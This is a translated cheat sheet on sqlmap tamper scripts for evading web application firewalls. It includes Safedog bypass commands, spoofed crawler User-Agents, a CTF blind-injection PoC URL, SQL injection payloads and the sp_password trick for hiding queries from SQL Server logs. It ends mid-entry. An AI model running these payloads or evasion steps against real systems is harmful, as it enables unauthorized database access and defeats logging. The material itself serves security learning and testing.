sqlmap: advanced use of tamper scripts against applications

Commonly used commands

  • Safedog detection (--tamper "safedog2.py"; safedog2.py is not shipped with sqlmap, it is a third-party script you drop into sqlmap's tamper/ directory yourself; -r reads the captured request from a file, x.txt in the examples below)
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch -r x.txt

  • Safedog full scan: add --level 5 --risk 3
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --level 5 --risk 3 -r x.txt

  • Safedog full scan with delays: add
    --delay 2        wait 2 seconds between HTTP requests
    --timeout=60     seconds to wait before a connection times out (default 30)
    --time-sec=60    seconds of delay used by time-based blind payloads (default 5)
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --delay 2 --time-sec=60 --timeout=60 --level 5 --risk 3 -r x.txt

Commonly used commands against MySQL

  • Quick scan: --tamper "bluecoat.py"
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms MySQL --batch -r x.txt

  • With delay and timeout
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms MySQL --batch --delay 2 --timeout=11 -r x.txt

  • Full scan (the quick scan plus --level 5 --risk 3), still with bluecoat.py
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms MySQL --batch --level 5 --risk 3 -r x.txt

Speed things up by telling sqlmap the DBMS instead of letting it fingerprint it:

--dbms Oracle
--dbms MySQL
--dbms "Microsoft Access"

Practising injection yourself

  • DVWA (Damn Vulnerable Web Application)

  • (MySQL + PHP environment) The vulnerable PHP statement looks like this, with $id concatenated straight from the request:

$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; # only one row is returned

...

Getting past a WAF

Safedog and similar products.

  • Clear the cookies
    After capturing the request, remove the cookies if they are not needed, save the request as x.txt
    and feed it to sqlmap with -r x.txt

  • --timeout=10  seconds to wait before a connection times out (this is a timeout, not a delay between requests)

  • --ignore-proxy  ignore the system's default HTTP proxy

  • --delay=2  wait 2 seconds between HTTP requests

  • Random User-Agent
    add --random-agent

  • Fixed User-Agent
    Search-engine crawler User-Agents are on Safedog's whitelist. The check is on the header string alone, so a spoofed one gets the same treatment.

MSN crawler
--user-agent "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
Yahoo crawler
--user-agent "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Other User-Agents:
Android phone
User-Agent (taken from a request captured after Burp's automatic UA replacement)
--user-agent "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"

Tamper

Spaces filtered?
1. Try %a0, %0b and the other common whitespace substitutes; if those are blocked too,
2. wrap expressions in parentheses so that no space is needed at all.

[Huashan Cup CTF] Web 4: how to inject when there is a WAF
union and select were not filtered, but the UNION query never produced a display column, so blind injection was the only option:
id=1e0and(ascii(substr(database(),1,1))>1)
(1e0 is a float literal, which the lexer ends at the first non-digit, so no space is needed before and; the parentheses remove every other space.)

At first I assumed other tables could not be read, so I brute-forced the columns, but the current table only had two, Name and id.
Since the flag was not in this table, the only choice was to query across tables.
The PoC was built as follows (a Python str.format template: the first {} is the character position i, the second the candidate ASCII value d):
http://218.245.4.113:8080/web04/60c2a013a6decbe0c5c2883080e6b332/index.php?id=1e0and(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))={})'.format(i,d)
This gave the database names, tables and columns; in the end both the table and the column were named flag.....

For all databases

base64encode.py, apostrophemask.py / apostrophenullencode.py

  • Oracle
    greatest.py

  • MSSQL

  • MySQL
    greatest.py
    [MySQL only] bluecoat.py (equaltolike.py plus spaces turned into other blank characters)

  • Microsoft SQL Server
    equaltolike.py

  • PostgreSQL
    greatest.py

  • Microsoft Access

Replacing spaces
space2dash.py

Search by keyword

All scripts


apostrophemask.py  replaces the single quote ' with %EF%BC%87 (its UTF-8 full-width counterpart)

apostrophenullencode.py  replaces the single quote ' with %00%27 (its illegal double-unicode counterpart)

appendnullbyte.py  appends an encoded NUL byte, %00, to the end of the payload; for WAFs in front of [Access]

base64encode.py  Base64-encodes all characters of the payload

between.py  replaces the greater-than operator > with "NOT BETWEEN 0 AND #" and the equals operator = with "BETWEEN # AND #"  [mssql oracle mysql postgresql]

bluecoat.py  replaces the space after an SQL statement keyword with a valid random blank character, then replaces = with LIKE  [mysql]

charencode.py  URL-encodes all characters of the payload once (already encoded sequences are left alone)  [mssql oracle mysql postgresql]

chardoubleencode.py  double URL-encodes all characters of the payload (already encoded sequences are not re-encoded)

charunicodeencode.py  Unicode-URL-encodes the non-encoded characters of the payload (already encoded sequences are left alone)  [mssql oracle mysql postgresql]

concat2concatws.py  replaces instances like "CONCAT(A, B)" with "CONCAT_WS(MID(CHAR(0), 0, 0), A, B)"

equaltolike.py  replaces every equals sign = in the payload with the LIKE operator; for bypassing weak and bespoke WAFs that only filter =

halfversionedmorekeywords.py  adds the opener of a versioned MySQL comment, the three characters /*!, before each keyword  [mysql] WAF bypass

greatest.py  replaces the greater-than operator > with the GREATEST() function, for WAFs that block >

versionedkeywords.py  encloses each non-function keyword in a versioned MySQL comment, e.g. /*!UNION*/  [mysql]

ifnull2ifisnull.py  replaces instances like "IFNULL(A, B)" with "IF(ISNULL(A), B, A)"

lowercase.py  replaces each keyword character with its lowercase value

modsecurityversioned.py  embraces the complete query with a versioned comment

modsecurityzeroversioned.py  embraces the complete query with a zero-versioned comment

multiplespaces.py  adds multiple spaces around SQL keywords

nonrecursivereplacement.py  replaces predefined SQL keywords with representations that survive non-recursive replacement filters

overlongutf8.py  converts the (non-alphanumeric) characters of the payload to overlong UTF-8 sequences, e.g. ' becomes %C0%A7

percentage.py  adds a percent sign % in front of each character

randomcase.py  replaces each keyword character with a random case value

randomcomments.py  adds random comments to SQL keywords

securesphere.py  appends a specially crafted string

sp_password.py  appends sp_password to the end of the payload for automatic obfuscation from DBMS logs

space2comment.py  replaces the space character with the comment /**/

space2dash.py  replaces the space character with a dash comment -- followed by a random string and a new line

space2hash.py  replaces the space character with a pound character # followed by a random string and a new line

space2morehash.py  replaces the space character with a pound character # followed by a random string and a new line (variant for MySQL >= 5.1.13)

space2mssqlblank.py  replaces the space character with a random blank character from a valid set of alternate characters (MSSQL)

space2mssqlhash.py  replaces the space character with a pound character # followed by a new line

space2mysqlblank.py  replaces the space character with a random blank character from a valid set of alternate characters (MySQL)

space2mysqldash.py  replaces the space character with a dash comment -- followed by a new line

space2plus.py  replaces the space character with a plus sign +

space2randomblank.py  replaces the space character with a random blank character from a valid set of alternate characters

unionalltounion.py  replaces UNION ALL SELECT with UNION SELECT

unmagicquotes.py  replaces the quote character ' with the multi-byte combination %bf%27 and appends a generic comment at the end (wide-byte bypass of GPC / addslashes); it is the quote that is replaced, not the space

varnish.py  appends an HTTP header X-originating-IP to bypass the Varnish firewall

versionedmorekeywords.py  encloses each keyword in a versioned MySQL comment

xforwardedfor.py  appends a forged HTTP header X-Forwarded-For with a random IP (randomIP()) in an attempt to bypass the WAF


sqlmap

An automated SQL injection tool.
Its main job is to scan for, confirm and exploit SQL injection in a given URL.

sqlmap支持的數(shù)據(jù)庫

MySQL
Oracle
PostgreSQL
Microsoft SQL Server
Microsoft Access
DB2
SQLite
Firebird
Sybase
SAP MaxDB

SQL injection techniques used by sqlmap
(sqlmap's own README lists six: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band; the four that matter most for this page are the following)
Blind (inference) SQL injection
UNION query SQL injection
Stacked queries
Time-based blind SQL injection

Its broad set of features and options includes:
database fingerprinting, enumeration, data extraction, access to the target file system and, when the database user has the privileges, arbitrary command execution on the host.

Tamper scripts make sqlmap's attacks more effective against filtering.
Most of the plugins in the tamper directory are described below.

Against a WAF: quick application

1. The equals sign = is filtered

equaltolike.py can be used against these databases:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5

2. The space is filtered

space2dash.py can be used against these databases:
MSSQL
SQLite

space2hash.py (MySQL): a space becomes %23<random string>%0A

apostrophemask.py

Purpose: replaces the single quote ' with its UTF-8 full-width counterpart %EF%BC%87
(UTF-8 is the most widely used Unicode encoding. The full-width apostrophe U+FF07 is a different character from ', so this only works where something on the server side folds it back to an ASCII quote.)
Example:
1 AND '1'='1
1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

Docstring from the script (apostrophe character = single quote):
Replaces apostrophe character with its UTF-8 full width counterpart

References:
    * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
    * http://lukasz.pilorz.net/testy/unicode_conversion/
    * http://sla.ckers.org/forum/read.php?13,11562,11850
    * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

equaltolike.py

Purpose: replaces = with LIKE; for bypassing weak and bespoke WAFs that only filter the equals sign
Example:

  • Input: SELECT * FROM users WHERE id=1
  • Output: SELECT * FROM users WHERE id LIKE 1

Docstring from the script:
Replaces all occurances of operator equal ('=') with operator 'LIKE'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the equal character ('=')
    * The LIKE operator is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

Case 1: http://www.wooyun.org/bugs/wooyun-2010-087296
Case 2: http://www.wooyun.org/bugs/wooyun-2010-074790
Case 3: http://www.wooyun.org/bugs/wooyun-2010-072489

space2dash.py

Purpose: bypass filtering of the space (not of the equals sign; the = in the example is untouched)
It replaces each space with the comment marker -- followed by a random string and a new line \n
The URL-encoded value of a line feed is %0A

Example:
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
Taken apart: each space becomes --<random string>%0A
'1--nVNaVoPYeva%0A
AND--ngNvzqu%0A
9227=9227'

Docstring from the script:
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')

Requirement:
    * MSSQL
    * SQLite

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ZeroNights SQL injection challenge,
      https://proton.onsec.ru/contest/

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Case 1: http://www.wooyun.org/bugs/wooyun-2010-062878

greatest.py

Purpose: bypass filtering of >; it replaces the greater-than operator with GREATEST()
Example:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

Docstring from the script:
Replaces greater than operator ('>') with 'GREATEST' counterpart

Tested against:
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The GREATEST clause is a widespread SQL command. Hence, this
      tamper script should work against majority of databases

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

space2hash.py

[For MySQL 4.0, 5.0]
Purpose: replaces each space with a # (%23), a random string and a new line (%0A)
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    Taken apart: each space becomes %23<random string>%0A
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227
    Docstring from the script:
Replaces space character (' ') with a pound character ('#') followed by
    a random string and a new line ('\n')

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

    Notes:
        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')
    '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

apostrophenullencode.py

Purpose: bypass filtering of the single quote by replacing ' with %00%27 (an illegal double-unicode counterpart of ')
Example:
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
Taken apart:
'1 AND
%00%27
1
%00%27
=
%00%27
1'

Docstring from the script:
Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

halfversionedmorekeywords.py

Purpose: adds the opener of a versioned MySQL comment, the three characters /*! followed by the version 0, before each keyword  [mysql] WAF bypass

Example:
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
Taken apart:
"value'
/*!0
UNION
/*!0
ALL
/*!0
SELECT
/*!0
CONCAT(
/*!0
CHAR(58,107,112,113,58),
/*!0
IFNULL(CAST(
/*!0
CURRENT_USER()
/*!0
AS
/*!0
CHAR),
/*!0
CHAR(32)),
/*!0
CHAR(58,97,110,121,58)),
/*!0
NULL,
/*!0
NULL#
/*!0
AND 'QDWa'='QDWa"

Explanation of /*! ... */ comments (from the web)
The MySQL server has some extensions that other SQL DBMSs lack.
If a version number follows the "!" character, the syntax inside the comment is executed only when the MySQL version is >= that number:
CREATE /*!32302 TEMPORARY */ TABLE t (c INT);
This means: if the server version is 3.23.02 or higher, the TEMPORARY keyword is used.
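To make the version rule concrete, here is a small Python helper, written for this page and not MySQL's or sqlmap's code, that shows what a MySQL server of a given version would execute for a statement containing /*!NNNNN ... */ comments. Version strings are converted the way MySQL numbers them, major*10000 + minor*100 + patch, so 3.23.02 is 32302 and 5.0.22 is 50022. It handles only well-formed comments (a five-digit version or none, and a closing */); the half-open /*!0KEYWORD form that halfversionedmorekeywords.py emits relies on the leniency of MySQL < 5.1 noted in its Requirement and is not modelled here. The function names are this example's own.

```python
import re

# /*!NNNNN body */  or  /*! body */ ; non-greedy body, may span lines
_VERSIONED = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.S)


def version_number(version: str) -> int:
    """'5.0.22' -> 50022: MySQL compares the digits after /*! with this integer."""
    parts = (version.split(".") + ["0", "0"])[:3]
    major, minor, patch = (int(x) for x in parts)
    return major * 10000 + minor * 100 + patch


def expand_versioned_comments(sql: str, server_version: str) -> str:
    """
    Return the statement as a server of server_version would tokenize it.
    /*!NNNNN text */ contributes `text` when the server is at least version
    NNNNN and nothing otherwise; /*! text */ without a number always contributes
    `text`. The comment boundaries act as token separators, hence the spaces
    added around the body. Plain /* ... */ comments are left untouched.
    """
    current = version_number(server_version)

    def replace(match):
        required, body = match.group(1), match.group(2)
        if required is None or current >= int(required):
            return " " + body + " "
        return " "

    return _VERSIONED.sub(replace, sql)


def tokens(sql: str, server_version: str) -> str:
    """Whitespace-normalised view, convenient for comparing results."""
    return " ".join(expand_versioned_comments(sql, server_version).split())


if __name__ == "__main__":
    stmt = "CREATE /*!32302 TEMPORARY */ TABLE t (c INT);"
    for ver in ("3.22.34", "3.23.02", "5.0.22"):
        print(ver, "->", tokens(stmt, ver))
    print(tokens("1/*!UNION*//*!ALL*//*!SELECT*/2", "5.5.11"))
```

The second print shows why versionedkeywords.py's /*!UNION*/ form works at all: the comment delimiters separate tokens, so no space is needed between the keywords, which is what lets the script remove the spaces a WAF keys on.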

Docstring from the script:
Adds versioned MySQL comment before each keyword

Requirement:
    * MySQL < 5.1

Tested against:
    * MySQL 4.0.18, 5.0.22

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

space2morehash.py

Purpose: replaces each space with a #, a random string and a new line (%0A); the MySQL >= 5.1.13 variant of space2hash.py
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    Taken apart:
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227

Docstring from the script:
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.41

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

appendnullbyte.py

Purpose: appends an encoded NUL byte, %00, to the end of the payload; may work against WAFs in front of an Access database
Example:
'1 AND 1=1'
'1 AND 1=1%00'

Comment characters in SQL:
Access has no dedicated comment syntax (/* */, -- and # all fail), but a NUL character (URL-encoded %00) can be used to cut off the rest of the statement, e.g.
' UNION SELECT Count(*) FROM admin%00

Docstring from the script:
Appends encoded NULL byte character at the end of payload

Requirement:
    * Microsoft Access

Notes:
    * Useful to bypass weak web application firewalls when the back-end
      database management system is Microsoft Access - further uses are
      also possible

Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

ifnull2ifisnull.py

Purpose: bypass filtering of IFNULL; replaces IFNULL(A, B) with IF(ISNULL(A), B, A)
Example:
'IFNULL(1, 2)'
'IF(ISNULL(1),2,1)'

Docstring from the script:
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

Requirement:
    * MySQL
    * SQLite (possibly)
    * SAP MaxDB (possibly)

Tested against:
    * MySQL 5.0 and 5.5

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that filter the IFNULL() function

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

space2mssqlblank.py (MSSQL)

Purpose: replaces each space with a random blank character from a valid set of alternatives

Example:
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-062878

Docstring from the script:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * Microsoft SQL Server

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""

# ASCII table:
#   SOH     01      start of heading
#   STX     02      start of text
#   ETX     03      end of text
#   EOT     04      end of transmission
#   ENQ     05      enquiry
#   ACK     06      acknowledge
#   BEL     07      bell
#   BS      08      backspace
#   TAB     09      horizontal tab
#   LF      0A      new line
#   VT      0B      vertical TAB
#   FF      0C      new page
#   CR      0D      carriage return
#   SO      0E      shift out
#   SI      0F      shift in

base64encode.py

Purpose: Base64-encodes all characters of the payload

Example: ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

Requirement: all (only useful where the application Base64-decodes the parameter before using it)

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-060071
Case 2:
http://www.wooyun.org/bugs/wooyun-2010-021062
Case 3:
http://www.wooyun.org/bugs/wooyun-2010-043229

space2mssqlhash.py

Purpose: replaces each space with a # followed by a new line \n,
i.e. %20 becomes %23%0A

Example:
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

Docstring from the script:
"""
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')

Requirement:
    * MSSQL
    * MySQL

Notes:
    * Useful to bypass several web application firewalls

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""

modsecurityversioned.py

Purpose: embraces the complete query with a versioned MySQL comment

Aimed at ModSecurity (see the note in the docstring). The random version number (30874 in the example) is low enough that any MySQL 4 or 5 server executes the comment body, so the query itself is unchanged.

Example:
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'

Docstring from the script:

"""
    Embraces complete query with versioned comment

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF/IDS

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'
"""

space2mysqlblank.py

Purpose: replaces each space with a random blank character from a valid set of alternatives

Example:

  • Input: SELECT id FROM users
  • Output: SELECT%0Bid%0BFROM%A0users

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-076735

Docstring from the script:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * MySQL

Tested against:
    * MySQL 5.1

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Bid%0DFROM%0Cusers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return
#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)

between.py

Purpose: replaces > and = with BETWEEN forms: "> B" becomes "NOT BETWEEN 0 AND B" and "= B" becomes "BETWEEN B AND B" (< is not handled)

Example:
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-068815

Docstring from the script:
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The BETWEEN clause is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
"""

space2mysqldash.py (note: the earlier one was the MSSQL version, this one is for MySQL)

Purpose: replaces each space with a dash comment -- followed by a new line \n
i.e. a space becomes --\n (--%0A)
Example:
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

Docstring from the script:
"""
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')

Requirement:
    * MySQL
    * MSSQL

Tested against:

Notes:
    * Useful to bypass several web application firewalls.

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""

multiplespaces.py

Purpose: adds multiple spaces around SQL keywords
i.e. one space becomes several
Example:
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-072489

Docstring from the script:
"""
Adds multiple spaces around SQL keywords

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions

Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

"""

space2plus.py

Purpose: replaces each space with a plus sign +
Example: ('SELECT id FROM users')
'SELECT+id+FROM+users'

Docstring from the script:
"""
Replaces space character (' ') with plus ('+')

Notes:
    * Is this any useful? The plus get's url-encoded by sqlmap engine
      invalidating the query afterwards
    * This tamper script works against all databases

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""

bluecoat.py

Purpose: replaces the space after an SQL statement keyword with a valid random blank character, then replaces = with LIKE

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

Docstring from the script:

"""
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator

Requirement:
    * Blue Coat SGOS with WAF activated as documented in
    https://kb.bluecoat.com/index?page=content&id=FAQ2147

Tested against:
    * MySQL 5.1, SGOS

Notes:
    * Useful to bypass Blue Coat's recommended WAF rule configuration

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""

nonrecursivereplacement.py

Purpose: defeats non-recursive keyword stripping, i.e. application code that does a single .replace("SELECT", "") pass.
Each keyword is written with a copy of itself inserted in the middle, e.g. SELESELECTCT: the filter removes the inner SELECT once and the outer halves join back into SELECT.

Docstring from the script:
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters

Notes:
    * Useful to bypass very weak custom filters

>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""

space2randomblank.py

Purpose: replaces each space with a random blank character from a valid set of alternatives

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'

Docstring from the script:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return

sp_password.py

Purpose: appends sp_password to the end of the payload (automatic obfuscation from DBMS logs); SQL Server leaves statements containing sp_password out of its T-SQL logging

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

Docstring from the script:
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

Requirement:
    * MSSQL

Notes:
    * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
    * Reference: http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

chardoubleencode.py

Purpose: URL-encodes all characters twice (already encoded sequences are not re-encoded)

For example the character A is URL-encoded once to %41; the percent sign is then encoded again (the 4 and 1 stay as they are), giving %2541.
% itself URL-encodes to %25.

How an existing %20 is treated: the script never re-encodes it byte by byte.
Original payload: SELECT FIELD FROM%20TABLE
Every unencoded character is encoded once and existing %XX sequences are kept,
then every % is replaced by %25.

Worked example:
SELECT FIELD FROM%20TABLE (encoding the %20 naively character by character would give %25%32%30; the script leaves already encoded sequences alone)
After one round (the existing %20 stays): %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
After replacing every % with %25: %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

Docstring from the script:
"""
Double url-encodes all characters in a given payload (not processing
already encoded)

Notes:
    * Useful to bypass some weak web application firewalls that do not
      double url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""

unionalltounion.py

Purpose: replaces UNION ALL SELECT with UNION SELECT

Docstring from the script:
"""
Replaces UNION ALL SELECT with UNION SELECT

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""

charencode.py

Purpose: URL-encodes all characters of the payload once (already encoded sequences are left alone)
Example:
'SELECT FIELD FROM%20TABLE'
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

Docstring from the script:

"""
Url-encodes all characters in a given payload (not processing already
encoded)

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak web application firewalls that do not
      url-decode the request before processing it through their ruleset
    * The web server will anyway pass the url-decoded version behind,
      hence it should work against any DBMS

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""

randomcase.py

Purpose: replaces each character of every keyword (the ones a WAF is likely to match on) with a random case

Docstring from the script:

"""
Replaces each keyword character with random case value

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions
    * This tamper script should work against all (?) databases

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""

unmagicquotes.py

Anti magic quotes [wide-byte bypass of GPC addslashes]
Purpose: replaces the single quote ' with %bf%27 and appends a generic comment -- at the end so the statement still runs. Only useful when the MySQL connection uses a multi-byte charset such as GBK, where the backslash (%5c) that addslashes inserts is swallowed as the second byte of the %bf%5c character.
Docstring from the script:

"""
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)

Notes:
    * Useful for bypassing magic_quotes/addslashes feature

Reference:
    * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

>>> tamper("1' AND 1=1")
'1%bf%27-- '
"""

randomcomments.py

Purpose: inserts /**/ at random positions inside SQL keywords (between their letters)

Docstring from the script:
"""
Add random comments to SQL keywords

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
